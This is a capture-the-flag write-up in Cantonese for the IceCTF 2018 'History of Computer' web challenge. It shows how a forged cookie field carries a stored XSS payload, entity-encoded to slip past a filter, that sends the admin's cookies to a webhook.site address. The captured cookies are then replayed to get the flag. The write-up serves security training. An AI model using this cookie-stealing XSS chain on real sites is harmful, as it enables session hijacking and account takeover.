2018-09-12

IceCTF2018-History-Of-Computer

Solution

首先一入到去見到有得註冊喎 , 咁註冊完登入睇下咩料子先啦
發現有得留 comment , 留個試下先, 留完仲有得report添喎 , 仲唔係玩xss?

發現有2個奇怪既 cookies , 分別係 session 同埋 token

咁似 base64 既 , decode黎睇下先

import base64
#session
base64.b64decode('eyJ1c2VyIjoyfQ.Dno_HQ.0n1XWQBTVFhQ9NxFkuqWKik5uJU==')
#{"user":2}\x00\xe7\xa0t4\x9fU\xd6@\x14\xd5\x16\x14=7\x11d\xba\xa5\x8a\x8aNn%

#token
base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=')
#{"typ":"JWT","alg":"none"}
base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==')
#{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}

咁發現有個 username 喎 , 同埋 user係2. 有2咁應該有1啦 , 我諗終極目標係拎到user:1 既登入資料掛?
咁試下改個username啦

1
2
3

import base64
base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有

竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇

竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦

1
2
3

improt base64
base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=

但是原來有做 filtering

試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既

1
2
3

import base64
base64.b64encode('{"username":"<img src=x onerror=\'&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

呢抽野

1	&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41

其實係

1	javascript:alert('XSS')

大家可以用呢個網試下轉
http://evuln.com/tools/xss-encoder/

然後就可以構造個http request比admin access啦

1	function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();

1
2
3

import base64
base64.b64encode('{"username":"<img src=x onerror=\'&#102&#117&#110&#99&#116&#105&#111&#110&#32&#104&#116&#116&#112&#71&#101&#116&#40&#41&#123&#118&#97&#114&#32&#120&#109&#108&#72&#116&#116&#112&#32&#61&#32&#110&#101&#119&#32&#88&#77&#76&#72&#116&#116&#112&#82&#101&#113&#117&#101&#115&#116&#40&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#111&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#115&#58&#47&#47&#119&#101&#98&#104&#111&#111&#107&#46&#115&#105&#116&#101&#47&#57&#50&#56&#101&#52&#53&#48&#49&#45&#52&#98&#55&#51&#45&#52&#52&#57&#49&#45&#97&#51&#100&#101&#45&#49&#48&#101&#48&#99&#97&#100&#55&#56&#57&#99&#98&#63&#97&#61&#34&#32&#43&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#44&#32&#102&#97&#108&#115&#101&#32&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#115&#101&#110&#100&#40&#32&#110&#117&#108&#108&#32&#41&#59&#125&#104&#116&#116&#112&#71&#101&#116&#40&#41&#59\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDImIzExNyYjMTEwJiM5OSYjMTE2JiMxMDUmIzExMSYjMTEwJiMzMiYjMTA0JiMxMTYmIzExNiYjMTEyJiM3MSYjMTAxJiMxMTYmIzQwJiM0MSYjMTIzJiMxMTgmIzk3JiMxMTQmIzMyJiMxMjAmIzEwOSYjMTA4JiM3MiYjMTE2JiMxMTYmIzExMiYjMzImIzYxJiMzMiYjMTEwJiMxMDEmIzExOSYjMzImIzg4JiM3NyYjNzYmIzcyJiMxMTYmIzExNiYjMTEyJiM4MiYjMTAxJiMxMTMmIzExNyYjMTAxJiMxMTUmIzExNiYjNDAmIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTEmIzExMiYjMTAxJiMxMTAmIzQwJiMzNCYjNzEmIzY5JiM4NCYjMzQmIzQ0JiMzMiYjMzQmIzEwNCYjMTE2JiMxMTYmIzExMiYjMTE1JiM1OCYjNDcmIzQ3JiMxMTkmIzEwMSYjOTgmIzEwNCYjMTExJiMxMTEmIzEwNyYjNDYmIzExNSYjMTA1JiMxMTYmIzEwMSYjNDcmIzU3JiM1MCYjNTYmIzEwMSYjNTImIzUzJiM0OCYjNDkmIzQ1JiM1MiYjOTgmIzU1JiM1MSYjNDUmIzUyJiM1MiYjNTcmIzQ5JiM0NSYjOTcmIzUxJiMxMDAmIzEwMSYjNDUmIzQ5JiM0OCYjMTAxJiM0OCYjOTkmIzk3JiMxMDAmIzU1JiM1NiYjNTcmIzk5JiM5OCYjNjMmIzk3JiM2MSYjMzQmIzMyJiM0MyYjMzImIzEwMCYjMTExJiM5OSYjMTE3JiMxMDkmIzEwMSYjMTEwJiMxMTYmIzQ2JiM5OSYjMTExJiMxMTEmIzEwNyYjMTA1JiMxMDEmIzQ0JiMzMiYjMTAyJiM5NyYjMTA4JiMxMTUmIzEwMSYjMzImIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTUmIzEwMSYjMTEwJiMxMDAmIzQwJiMzMiYjMTEwJiMxMTcmIzEwOCYjMTA4JiMzMiYjNDEmIzU5JiMxMjUmIzEwNCYjMTE2JiMxMTYmIzExMiYjNzEmIzEwMSYjMTE2JiM0MCYjNDEmIzU5Jz4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=

然後禁 report , 再等幾秒

https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.; session=eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU

最後 get flag!

1
2
3

import requests
cookie = {'token':'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.', 'session':'eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU'}
requests.get("https://43xa7xhkaj0cd8c-history.labs.icec.tf/", cookies=cookie).text

<!DOCTYPE html>
  <html>
    <head>
      <!--Import Google Icon Font-->
      <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
      <!--Import materialize.css-->

     <link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css"  media="screen,projection"/>
      <link type="text/css" rel="stylesheet" href="/static/css/main.css"  media="screen,projection"/>
      <link type="text/css" rel="stylesheet" href="/static/css/style.css"  media="screen,projection"/>

      <!--Let browser know website is optimized for mobile-->
      <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
    </head>
    <body>

        <nav>
            <div class="nav-wrapper white">
                <div class="container">
                    <a href="/" class="brand-logo">History of Computing</a>
                    <ul id="nav-mobile" class="right hide-on-med-and-down">
                        
                            <li>admin</li>

<li><a href="/logout">Logout</a></li>
                        
                    </ul>
                </div>
            </div>
        </nav>

        

<div class="ribbon pink"></div>
<div class="container">
    
    <div class="flag center blue white-text">
        IceCTF{who_trusts_these_cookies_anyway?}
    </div>
    
    <div class="row post">
        <div class="col s12">
            <div class="card">
                <div class="card-image">
                    <img src="/static/img/icectfteam.jpg">
                    <span class="card-title">The First Compiler</span>
                </div>
                
                <a class="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger" href="#comment-modal" data-id="1"><i class="material-icons">comment</i></a>

       
                <div class="card-content">
                    <h5>IceCTF Worked on The First Compiler</h5>
                    <p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p>
                    <p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p>
                    <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
                </div>
            </div>
        </div>
    </div>
    
</div>

<div class="ribbon cyan"></div>
<div class="container">
    <div class="row">
        <div class="col s12">
            <div class="card">
                <div class="card-image">
                    <img src="/static/img/eniac.jpg">
                    <span class="card-title">The ENIAC!</span>
                </div>
                
                    <a class="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger" href="#comment-modal" data-id="2"><i class="material-icons">comment</i></a>
                
                <div class="card-content">
                    <h5>The IceCTF Team Created The ENIAC!</h5>
                    <p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p>
                    <p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p>
                    <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
                </div>
            </div>
        </div>
    </div>
    
</div>


<footer class="page-footer grey darken-3">
    <div class="container">
        <div class="row">
            <div class="col l6 s12">
                <h5 class="white-text">About Me</h5>
                <p class="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p>
            </div>
        </div>
    </div>
    <div class="footer-copyright">
        <div class="container">
            Made with <a class="brown-text text-lighten-3" href="http://materializecss.com">Materialize</a>
        </div>
    </div>
</footer>

<div id="comment-modal" class="modal">
    <nav class="cyan">
        <div class="nav-wrapper">
            <div class="left col s12 m5 l5">
                <ul>
                    <li><a class="modal-action modal-close"><i class="material-icons">keyboard_backspace</i></a>
                    </li>

     <li><a href="#!">Comment</a>
                    </li>
                </ul>
            </div>
            <div class="col s12 m7 l7 hide-on-med-and-down">
                <ul class="right">

            <li><a class="modal-action modal-close comment-send"><i class=" material-icons">send</i></a>
                    </li>
                </ul>
            </div>

        </div>
    </nav>
    <div class="modal-content">
        <form id="comment-form" action="/comment" method="post">
            <div class="input-field">
                <textarea id="comment" class="materialize-textarea" length="500"></textarea>
                <label for="comment">Comment</label>
            </div>
            <input type="hidden" name="postId" id="postId" value="2">
        </form>
    </div>
</div>
</div>



        <!--Import jQuery before materialize.js-->
        <script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
        <script type="text/javascript" src="/static/js/materialize.min.js"></script>
        <script type="text/javascript" src="/static/js/init.js"></script>
        <script type="text/javascript" src="/static/js/main.js"></script>
    </body>
  </html>

Flag

1	IceCTF{who_trusts_these_cookies_anyway?}